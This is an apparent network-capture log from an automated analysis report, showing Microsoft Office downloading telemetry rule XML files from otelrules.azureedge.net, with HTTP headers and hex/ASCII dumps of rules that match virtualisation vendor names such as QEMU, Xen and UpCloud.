                                                                                                                            2024-11-29 07:31:10 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            80192.168.2.54980213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:10 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:10 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:10 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 469
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                            x-ms-request-id: 7e595f47-c01e-0049-281b-41ac27000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073110Z-174f7845968n2hr8hC1EWR9cag0000000z7g000000006c1a
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:10 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            81192.168.2.54980313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:11 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:12 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:12 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 416
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                            x-ms-request-id: 3111ff0c-301e-001f-4971-40aa3a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073112Z-174f7845968n2hr8hC1EWR9cag0000000z60000000008vkw
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:12 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            82192.168.2.54980413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:12 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:12 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:12 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 472
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                            x-ms-request-id: 77f1aa82-301e-003f-6391-3f266f000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073112Z-174f7845968l4kp6hC1EWRe8840000000zvg000000005vrd
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:12 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            83192.168.2.54980513.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:12 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:12 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:12 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 432
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                            x-ms-request-id: 9a67ffab-601e-00ab-7222-4166f4000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073112Z-174f7845968swgbqhC1EWRmnb40000000zr0000000008833
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:12 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            84192.168.2.54980713.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:12 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:12 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:12 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 427
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                            x-ms-request-id: 6ec4d531-a01e-0084-3507-419ccd000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073112Z-174f7845968pght8hC1EWRyvxg00000002ug000000001vzx
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:12 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            85192.168.2.54980613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:12 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:13 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:12 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 475
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                            x-ms-request-id: 3d9c2adf-901e-00ac-7b91-3fb69e000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073112Z-174f78459684bddphC1EWRbht40000000zd0000000002n8g
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:13 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            86192.168.2.54980813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:14 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:14 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:14 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 474
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                            x-ms-request-id: 89e8b03d-001e-0065-5291-3f0b73000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073114Z-174f7845968cpnpfhC1EWR3afc0000000z9g000000002kmc
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:14 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            87192.168.2.54980913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:14 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:14 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:14 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 419
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                            x-ms-request-id: 4f79ec39-601e-0070-0891-3fa0c9000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073114Z-174f78459688l8rvhC1EWRtzr00000000c90000000001q8t
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:14 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            88192.168.2.54981013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:14 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:15 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:14 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 472
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                            x-ms-request-id: 5c7cfbca-b01e-0002-28f7-411b8f000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073114Z-174f7845968px8v7hC1EWR08ng0000000zy0000000001yzf
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:15 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            89192.168.2.54981113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:14 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:15 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:15 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 405
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                            ETag: "0x8DC582B942B6AFF"
                                                                                                                            x-ms-request-id: f510ddc6-f01e-0000-2f4a-40193e000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073115Z-174f7845968jrjrxhC1EWRmmrs0000000zq0000000008wge
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:15 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
